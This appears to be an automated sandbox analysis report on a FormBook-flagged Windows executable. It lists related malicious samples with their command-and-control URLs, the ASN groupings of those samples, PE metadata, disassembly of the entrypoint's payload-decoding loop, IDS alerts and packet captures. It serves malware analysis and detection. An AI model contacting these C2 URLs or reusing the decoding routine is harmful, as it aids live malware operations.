	PO#218740.exe	Get hash	malicious	Browse	www.shelvesthatslude.com/wpsb/?Wxo=rpLKkbKOXOuXHBcSnbCAYX8fIodJm2eBCOkizxG+Jmq98pcfRrdFVbp7k49Tb//P+n9l&vB=lhv8
	g2fUeYQ7Rh.exe	Get hash	malicious	Browse	www.laalianza.net/nki/?-Z1l=PROIUmUOyDGddH4liQ5hJmVkj46+Q85xpoxC45PqJI4e45Ope3SXSrB15gOtY6GR/pks5ou7bA==&5ju=UlSpo
	c6Rg7xug26.exe	Get hash	malicious	Browse	www.fallguysmovile.com/kgw/?JfExsTlp=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864+OaOF7shv&njnddr=RhlPiv
	IRS Notice Letter pdf document.exe	Get hash	malicious	Browse	www.myaarpdentalpln.com/09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS
	mQFXD5FxGT.exe	Get hash	malicious	Browse	thevampire_vvv.byethost32.com/loglogin.html
	099898892.exe	Get hash	malicious	Browse	www.fux.xyz/nt8e/?2dj=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLtt2QtFrhXJ5&BR-LnJ=YVJpeDOX
	ZIPEXT#U007e1.EXE	Get hash	malicious	Browse	ww1.survey-smiles.com/
	SAWR000148651.exe	Get hash	malicious	Browse	www.phymath.science/6bu2/?u6u0=C0Tcv4PEDaSqiqbiBHmU4chmBJ2Ib35dQ7WAYQJ79jvi7RJiRJeSkc3aZR5iI925ug+e&9r4l2=xPJtQXiX
	SHIPPING INVOICEpdf.exe	Get hash	malicious	Browse	www.biphome.com/th7/?Wxo=F3X7BvJsNeC3FygCw13H4IB8jadIkqJtXdmqtCOR8NGnB4xp+pRJAqP9Tbys+XJlW324&vB=lhvxP
	IRS Notice Letter.exe	Get hash	malicious	Browse	www.fallguysgen.com/09rb/?BjR=8wyat+wXPx2GJTjzAS1v8j/sun3jJOBqARbtJLQTOj6W6terly/mLKuj1YP1OuE1trgD&ojPLdR=9r9xbv2Prvr4
	IRS Notice Letter.exe	Get hash	malicious	Browse	www.fallguysgen.com/09rb/?QL3=8wyat+wXPx2GJTjzAS1v8j/sun3jJOBqARbtJLQTOj6W6terly/mLKuj1bj2SeINgKdVJ18iPg==&vDH4Y=N8lT8DApP2
	Payment Order Inv.exe	Get hash	malicious	Browse	www.lakecharlesloan.com/m98/
	h3dFAROdF3.exe	Get hash	malicious	Browse	www.srteamsex.com/jskg/?8pgD2lkp=vPxUJOJ2Aeffo2LE3jfwO3D5fUiArIaEsmmMIyas9ke7k/N8Gf6ZXTSsViol9x5Z8LaI&yTIDml=X6XHfZU8d
	kqwqyoFz1C.exe	Get hash	malicious	Browse	www.srteamsex.com/jskg/?9roHn=vPxUJOJ2Aeffo2LE3jfwO3D5fUiArIaEsmmMIyas9ke7k/N8Gf6ZXTSsViol9x5Z8LaI&npHhW=3fq4gDD0abs8
	file.exe	Get hash	malicious	Browse	www.capialhealth.com/w8en/?wZ=OZNhib&iJE=PC3EVoXx07elaN9zQ9JVPu3uhPMA8lrp9yOZFfU9U+2Z+rMvgXeGWrCKYNniyi9/Q+4F/80NIg==
	PByYRsoSNX.exe	Get hash	malicious	Browse	www.traptlongview.com/csv8/?wPX=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslWD0h5HAfE9z&UPnDHz=SVETu4vhSBmH6
34.102.136.180	orden pdf.exe	Get hash	malicious	Browse	www.unbelievabowboutique.com/n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR
	J0OmHIagw8.exe	Get hash	malicious	Browse	www.epicmassiveconcepts.com/csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT
	zHgm9k7WYU.exe	Get hash	malicious	Browse	www.ricardoinman.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl
	JAAkR51fQY.exe	Get hash	malicious	Browse	www.epicmassiveconcepts.com/csv8/?EZUXxJ=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&DzrLH=VBZHYDrxndGXyf
	65BV6gbGFl.exe	Get hash	malicious	Browse	www.outlawgospelshow.com/kgw/?D81dO=3dsCTSsKJfcfLyYHdfjcimIAevlOxP45YAOPNmiGb3RckDOY5KdZ2EMbApwY76ndqYux&tTrL=Fpgl
	YvGnm93rap.exe	Get hash	malicious	Browse	www.crafteest.com/8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH
	Order_00009.xlsx	Get hash	malicious	Browse	www.brainandbodystrengthcoach.com/csv8/?1bwhC=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&tB=TtdpPpwhOlt
	13-01-21.xlsx	Get hash	malicious	Browse	www.kolamart.com/bw82/?x2J8=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&Ab=gXuD_lh8bfV4RN
	NEW 01 13 2021.xlsx	Get hash	malicious	Browse	www.gdsjgf.com/bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf-
	PO85937758859777.xlsx	Get hash	malicious	Browse	www.bodyfuelrtd.com/8rg4/?RJ=A4ItsHP7WirPGvorxE1FqdRUH2iuHEJ7Bx0GuGGPjza4UX3M9OXu5uVQhTJ1ITDXtosJtw==&LFQHH=_pgx3Rd
	Order_385647584.xlsx	Get hash	malicious	Browse	www.oohdough.com/csv8/?NP=oR+kRp92OlWNPHb8tFeSfFFusuQV5SLrlvHcvTTApHN9lxDZF+KzMj/NshbaIk6/gJtwpQ==&nN6l9T=K0GdGdPX7JyL
	PO#218740.exe	Get hash	malicious	Browse	www.epochryphal.com/wpsb/?Wxo=n7b+ISrk/mPyWzbboTpvP41tNOKzDU5etPpa3uuDPgrT9THM2mbO6pyh4trMr+rUEpul&vB=lhv8
	20210111 Virginie.exe	Get hash	malicious	Browse	www.mrkabaadiwala.com/ehxh/?Gzux=8Ka3Lv4ePZYbHHrfWWyIjg6yKJpjzOn7QTDTNOD0A86ZD78kMrm+GgFnyvrieFQhDFXfm2RQfw==&AnB=O0DToLD8K
	20210113155320.exe	Get hash	malicious	Browse	www.ortigiarealty.com/dkk/?BZ=59qCdC3RMUvEyWKLbbpm6Z+GlV/JTwbDjS9GwZYTXRwVfK7Z9ENGl/302ncjjG4TtqPC&I6A=4hOhA0
	13012021.exe	Get hash	malicious	Browse	www.sydiifinancial.com/rbg/?-ZV4gjY=zsOc27F1WxfzCuYGlMZHORhUu2hDO+A8T5/oUCY+tOSiKp0YV+JX8kcBbP6nsiP5HbIi&-ZSl=1bgPBf
	Po-covid19 2372#w2..exe	Get hash	malicious	Browse	www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct
	FtLroeD5Kmr6rNC.exe	Get hash	malicious	Browse	www.abilitiesin.com/umSa/?8p=z9MTiPW3cvjSA5QkES0lRL7QE5QWzpSIb/5mf6QApKD6hYKwb/M4i12nx+gX2coGSm9PIjo5qw==&o2=jL30vpcXe
	6blnUJRr4yKrjCS.exe	Get hash	malicious	Browse	www.vettedwealthmanagement.com/umSa/?ET8T=brJeVU7eljMQcn5t6nrZLyoDpHpFr+iqwzUSRB88e+cRILPvJ2TiW12sA30gV7y33iXX&URfl=00DdGJE8CBEXFLip
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	www.basalmeals.com/h3qo/?CR=nh/gKqoyV5HeFjYxMy0eFbMJOpM49Sz3DGf/FH2Dw3liEqigPonoEfAZFGiauGMw1oau&RX=dnC44rW8qdHLY2q
	5DY3NrVgpI.exe	Get hash	malicious	Browse	www.schustermaninterests.com/de92/?FdC4E2D=otFI+gArfm9oxno+NlFHPe8CZ87dio0DjOpD7CEQ1ohXI6jwcMVL1BNDFt16zf60LSstTEfOYg==&AjR=9r4L1

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLEUS	orden pdf.exe	Get hash	malicious	Browse	34.102.136.180
	J0OmHIagw8.exe	Get hash	malicious	Browse	34.102.136.180
	zHgm9k7WYU.exe	Get hash	malicious	Browse	34.102.136.180
	JAAkR51fQY.exe	Get hash	malicious	Browse	34.102.136.180
	65BV6gbGFl.exe	Get hash	malicious	Browse	34.102.136.180
	YvGnm93rap.exe	Get hash	malicious	Browse	34.102.136.180
	ACH WIRE PAYMENT ADVICE..xlsx	Get hash	malicious	Browse	108.177.126.132
	VFe7Yb7gUV.exe	Get hash	malicious	Browse	8.8.8.8
	cremocompany-Invoice_216083-xlsx.html	Get hash	malicious	Browse	216.239.38.21
	Order_00009.xlsx	Get hash	malicious	Browse	34.102.136.180
	13-01-21.xlsx	Get hash	malicious	Browse	34.102.136.180
	NEW 01 13 2021.xlsx	Get hash	malicious	Browse	34.102.136.180
	PO85937758859777.xlsx	Get hash	malicious	Browse	34.102.136.180
	BankSwiftCopyUSD95000.ppt	Get hash	malicious	Browse	108.177.127.132
	Order_385647584.xlsx	Get hash	malicious	Browse	34.102.136.180
	rB26M8hfIh.exe	Get hash	malicious	Browse	8.8.8.8
	brewin-Invoice024768-xlsx.Html	Get hash	malicious	Browse	216.239.34.21
	WFLPGBTMZH.dll	Get hash	malicious	Browse	108.177.126.132
	PO#218740.exe	Get hash	malicious	Browse	34.98.99.30
	20210111 Virginie.exe	Get hash	malicious	Browse	34.102.136.180
BODIS-NJUS	in.exe	Get hash	malicious	Browse	199.59.242.153
	zHgm9k7WYU.exe	Get hash	malicious	Browse	199.59.242.153
	65BV6gbGFl.exe	Get hash	malicious	Browse	199.59.242.153
	PO85937758859777.xlsx	Get hash	malicious	Browse	199.59.242.153
	PO#218740.exe	Get hash	malicious	Browse	199.59.242.153
	g2fUeYQ7Rh.exe	Get hash	malicious	Browse	199.59.242.153
	c6Rg7xug26.exe	Get hash	malicious	Browse	199.59.242.153
	sample20210111-01.xlsm	Get hash	malicious	Browse	199.59.242.150
	IRS Notice Letter pdf document.exe	Get hash	malicious	Browse	199.59.242.153
	mQFXD5FxGT.exe	Get hash	malicious	Browse	199.59.242.153
	099898892.exe	Get hash	malicious	Browse	199.59.242.153
	ZIPEXT#U007e1.EXE	Get hash	malicious	Browse	199.59.242.153
	990109.exe	Get hash	malicious	Browse	199.59.242.153
	SAWR000148651.exe	Get hash	malicious	Browse	199.59.242.153
	SHIPPING INVOICEpdf.exe	Get hash	malicious	Browse	199.59.242.153
	https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FR	Get hash	malicious	Browse	199.59.242.153
	IRS Notice Letter.exe	Get hash	malicious	Browse	199.59.242.153
	IRS Notice Letter.exe	Get hash	malicious	Browse	199.59.242.153
	Payment Order Inv.exe	Get hash	malicious	Browse	199.59.242.153
	h3dFAROdF3.exe	Get hash	malicious	Browse	199.59.242.153
TEBYANIR	http://europeanclassiccomic.blogspot.com/2015/10/blueberry.html	Get hash	malicious	Browse	185.78.22.41
	PO Order 19082020.exe	Get hash	malicious	Browse	94.232.172.78
	8Request for correction.exe	Get hash	malicious	Browse	185.126.200.167
	6Request for Quotation #2212208 #2.exe	Get hash	malicious	Browse	185.126.200.141
	35Pall enquiry No FC-21565Project Specification.exe	Get hash	malicious	Browse	185.126.200.141
	54packing list.exe	Get hash	malicious	Browse	185.126.200.141
	66$6300USD.exe	Get hash	malicious	Browse	185.126.200.141
	57arik.exe	Get hash	malicious	Browse	185.126.200.141
	27arrriik.exe	Get hash	malicious	Browse	185.126.200.141
	27Halkbank_Ekstre_20181213_115314_79235.exe	Get hash	malicious	Browse	185.126.200.141
	33Specifications of Sample Products.exe	Get hash	malicious	Browse	185.126.200.160
	RFQ KFO-18094,xls.exe	Get hash	malicious	Browse	185.126.200.160
	Payment_Receipt.exe	Get hash	malicious	Browse	185.126.200.160
	malware.doc	Get hash	malicious	Browse	185.126.200.160
	malware.doc	Get hash	malicious	Browse	185.126.200.160
	malware.doc	Get hash	malicious	Browse	185.126.200.160
	malware.doc	Get hash	malicious	Browse	185.126.200.160
	malware.doc	Get hash	malicious	Browse	185.126.200.160
	malware.doc	Get hash	malicious	Browse	185.126.200.160
	68Halkbank_Ekstre_20181130_075314_792357.exe	Get hash	malicious	Browse	185.126.200.134

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.893187300476172
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	74852.exe
File size:	237056
MD5:	e295cb54968cb6f3575a7caf32fe7f5a
SHA1:	84405250603351ebe538e7ae34812704c0c3f480
SHA256:	15198bfd2fbc367f07a22c6b39ea4e658dfea4a51b74cb4a653eb4b936ad3db0
SHA512:	fb5be96870170a769262214bd72a356b6e845328a3838b3ebdb9e8d5f5b8d09c95e992acad00e7c24762d8e351daf6e1810ad44515374f2261f9a3565d857880
SSDEEP:	6144:QKPcYfkbpRxdaS4fKbOdHPHHHn1useoMcxp4j:QLzdaS4fKbOdHPnHxfMcxWj
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........UL...L...L....49.M.....G.\...L...w.......O.......N...kR0.M...kR7.M...kR2.M...RichL...........................PE..L...Y.._...

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x407970
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FFEA359 [Wed Jan 13 07:38:01 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	13f6eb96e7165e986a0d233796ec15e0

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov eax, 00001E14h
call 00007F14ECDD6718h
push 00409BCCh
call dword ptr [00408028h]
mov dword ptr [ebp-0Ch], eax
call 00007F14ECDD6385h
push 069A1AD6h
mov eax, dword ptr [ebp-0Ch]
push eax
call 00007F14ECDD6267h
mov dword ptr [ebp-20h], eax
push 09C857BEh
mov ecx, dword ptr [ebp-0Ch]
push ecx
call 00007F14ECDD6256h
mov dword ptr [ebp-10h], eax
push 93B3503Eh
mov edx, dword ptr [ebp-0Ch]
push edx
call 00007F14ECDD6245h
mov dword ptr [ebp-14h], eax
push 0000000Ah
push 00409BE8h
push 00000000h
call dword ptr [ebp-20h]
mov dword ptr [ebp-18h], eax
mov eax, dword ptr [ebp-18h]
push eax
push 00000000h
call dword ptr [ebp-10h]
mov dword ptr [ebp-1Ch], eax
push 00001A05h
mov ecx, dword ptr [ebp-1Ch]
push ecx
lea edx, dword ptr [ebp-00001E14h]
push edx
call 00007F14ECDD6676h
add esp, 0Ch
mov dword ptr [ebp-08h], 00000000h
jmp 00007F14ECDD640Bh
mov eax, dword ptr [ebp-08h]
add eax, 01h
mov dword ptr [ebp-08h], eax
cmp dword ptr [ebp-08h], 00001A05h
jnc 00007F14ECDD64D3h
mov ecx, dword ptr [ebp-08h]
mov dl, byte ptr [ebp+ecx-00001E14h]
mov byte ptr [ebp-01h], dl
movzx eax, byte ptr [ebp-01h]
xor eax, dword ptr [ebp-08h]
mov byte ptr [ebp-01h], al
movzx ecx, byte ptr [ebp-01h]
add ecx, dword ptr [ebp-08h]
mov byte ptr [ebp-01h], cl
movzx eax, byte ptr [eax]

Rich Headers

Programming Language:

[LNK] VS2012 build 50727
[ C ] VS2012 build 50727
[LNK] VS98 (6.0) imp/exp build 8168
[RES] VS2012 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8134	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x1a78	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xaac	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x110	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6d8a	0x6e00	False	0.425355113636	data	6.16120389918	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x6fe	0x800	False	0.4375	data	4.45062304769	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x22ad	0x2400	False	0.255099826389	data	4.66400488054	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x1a78	0x1c00	False	0.945870535714	data	7.76084459828	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xb1a	0xc00	False	0.7724609375	data	6.4424223402	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_RCDATA	0xc070	0x1a05	data	English	United States

Imports

DLL	Import
MSVCRT.dll	memset, pow, _strtime, _strdate, strlen, strcmp, strcat, strcpy, memcpy, isprint, malloc, exit, scanf, puts, fclose, putchar, printf, fscanf, fprintf, fopen, _strupr
KERNEL32.dll	GetStdHandle, HeapAlloc, ReleaseMutex, SuspendThread, ReadConsoleA, SetConsoleCursorPosition, GetModuleHandleW, GetProcessHeap, GetPrivateProfileSectionNamesW
SHELL32.dll	SHEmptyRecycleBinW
MAPI32.dll
WINMM.dll	midiOutGetErrorTextA, midiConnect, midiInStop, waveOutOpen, waveInGetDevCapsW, WOW32DriverCallback
loadperf.dll	LoadPerfCounterTextStringsW, UnloadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA, LoadPerfCounterTextStringsA
mscms.dll	DisassociateColorProfileFromDeviceW, SetColorProfileElementSize, CheckColors, GetPS2ColorRenderingIntent, SetColorProfileHeader, GetCountColorProfileElements, GetStandardColorSpaceProfileW
COMDLG32.dll	ChooseFontW, ChooseColorW, ReplaceTextA
USER32.dll	GrayStringW, GetDC

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/13/21-21:22:07.929063	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.7	8.8.8.8
01/13/21-21:23:28.224693	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49756	34.102.136.180	192.168.2.7
01/13/21-21:23:48.503897	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49757	80	192.168.2.7	35.242.183.249
01/13/21-21:23:48.503897	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49757	80	192.168.2.7	35.242.183.249
01/13/21-21:23:48.503897	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49757	80	192.168.2.7	35.242.183.249

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 21:21:43.258002043 CET	49740	80	192.168.2.7	199.59.242.153
Jan 13, 2021 21:21:43.380745888 CET	80	49740	199.59.242.153	192.168.2.7
Jan 13, 2021 21:21:43.380868912 CET	49740	80	192.168.2.7	199.59.242.153
Jan 13, 2021 21:21:43.380984068 CET	49740	80	192.168.2.7	199.59.242.153
Jan 13, 2021 21:21:43.503632069 CET	80	49740	199.59.242.153	192.168.2.7
Jan 13, 2021 21:21:43.504091978 CET	80	49740	199.59.242.153	192.168.2.7
Jan 13, 2021 21:21:43.504126072 CET	80	49740	199.59.242.153	192.168.2.7
Jan 13, 2021 21:21:43.504148960 CET	80	49740	199.59.242.153	192.168.2.7
Jan 13, 2021 21:21:43.504165888 CET	80	49740	199.59.242.153	192.168.2.7
Jan 13, 2021 21:21:43.504183054 CET	80	49740	199.59.242.153	192.168.2.7
Jan 13, 2021 21:21:43.504203081 CET	49740	80	192.168.2.7	199.59.242.153
Jan 13, 2021 21:21:43.504282951 CET	49740	80	192.168.2.7	199.59.242.153
Jan 13, 2021 21:21:43.504364014 CET	49740	80	192.168.2.7	199.59.242.153
Jan 13, 2021 21:22:24.789391041 CET	49754	80	192.168.2.7	185.78.22.74
Jan 13, 2021 21:22:24.919250011 CET	80	49754	185.78.22.74	192.168.2.7
Jan 13, 2021 21:22:24.919429064 CET	49754	80	192.168.2.7	185.78.22.74
Jan 13, 2021 21:22:24.919759989 CET	49754	80	192.168.2.7	185.78.22.74
Jan 13, 2021 21:22:25.049675941 CET	80	49754	185.78.22.74	192.168.2.7
Jan 13, 2021 21:22:25.049778938 CET	80	49754	185.78.22.74	192.168.2.7
Jan 13, 2021 21:22:25.049798012 CET	80	49754	185.78.22.74	192.168.2.7
Jan 13, 2021 21:22:25.050143003 CET	49754	80	192.168.2.7	185.78.22.74
Jan 13, 2021 21:22:25.050194979 CET	49754	80	192.168.2.7	185.78.22.74
Jan 13, 2021 21:22:25.180115938 CET	80	49754	185.78.22.74	192.168.2.7
Jan 13, 2021 21:22:25.180150032 CET	80	49754	185.78.22.74	192.168.2.7
Jan 13, 2021 21:22:25.180242062 CET	49754	80	192.168.2.7	185.78.22.74
Jan 13, 2021 21:23:28.042525053 CET	49756	80	192.168.2.7	34.102.136.180
Jan 13, 2021 21:23:28.082698107 CET	80	49756	34.102.136.180	192.168.2.7
Jan 13, 2021 21:23:28.085659981 CET	49756	80	192.168.2.7	34.102.136.180
Jan 13, 2021 21:23:28.085913897 CET	49756	80	192.168.2.7	34.102.136.180
Jan 13, 2021 21:23:28.126132011 CET	80	49756	34.102.136.180	192.168.2.7
Jan 13, 2021 21:23:28.224693060 CET	80	49756	34.102.136.180	192.168.2.7
Jan 13, 2021 21:23:28.225006104 CET	80	49756	34.102.136.180	192.168.2.7
Jan 13, 2021 21:23:28.225167036 CET	49756	80	192.168.2.7	34.102.136.180
Jan 13, 2021 21:23:28.225212097 CET	49756	80	192.168.2.7	34.102.136.180
Jan 13, 2021 21:23:28.265228033 CET	80	49756	34.102.136.180	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 21:20:34.571810007 CET	58717	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:34.622791052 CET	53	58717	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:35.369043112 CET	59762	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:35.416857004 CET	53	59762	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:36.507339954 CET	54329	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:36.555099010 CET	53	54329	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:38.243972063 CET	58052	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:38.292078972 CET	53	58052	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:39.396399975 CET	54008	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:39.445344925 CET	53	54008	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:40.266743898 CET	59451	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:40.314629078 CET	53	59451	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:42.454840899 CET	52914	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:42.502712011 CET	53	52914	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:43.971358061 CET	64569	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:44.023819923 CET	53	64569	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:45.228204012 CET	52816	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:45.276237011 CET	53	52816	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:46.369461060 CET	50781	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:46.417510033 CET	53	50781	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:47.206028938 CET	54230	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:47.253808975 CET	53	54230	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:48.439342022 CET	54911	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:48.490701914 CET	53	54911	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:49.240423918 CET	49958	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:49.288337946 CET	53	49958	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:50.088927984 CET	50860	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:50.136868000 CET	53	50860	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:51.007961035 CET	50452	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:51.058684111 CET	53	50452	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:52.380373001 CET	59730	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:52.431174994 CET	53	59730	8.8.8.8	192.168.2.7
Jan 13, 2021 21:20:55.042602062 CET	59310	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:20:55.112732887 CET	53	59310	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:09.003077030 CET	51919	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:09.053802967 CET	53	51919	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:19.104757071 CET	64296	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:19.165226936 CET	53	64296	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:23.292512894 CET	56680	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:23.352874041 CET	53	56680	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:23.455874920 CET	58820	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:24.315306902 CET	60983	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:24.463956118 CET	58820	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:25.322962046 CET	60983	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:25.479645014 CET	58820	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:25.517379999 CET	53	58820	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:25.612891912 CET	49247	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:25.669292927 CET	53	49247	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:26.339009047 CET	60983	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:26.398962021 CET	53	60983	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:30.074019909 CET	52286	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:30.130373955 CET	53	52286	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:43.092905998 CET	56064	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:43.253431082 CET	53	56064	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:43.381735086 CET	63744	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:43.437869072 CET	53	63744	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:44.051506042 CET	61457	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:44.110639095 CET	53	61457	8.8.8.8	192.168.2.7
Jan 13, 2021 21:21:44.761344910 CET	58367	53	192.168.2.7	8.8.8.8
Jan 13, 2021 21:21:44.809230089 CET	53	58367	8.8.8.8	192.168.2.7
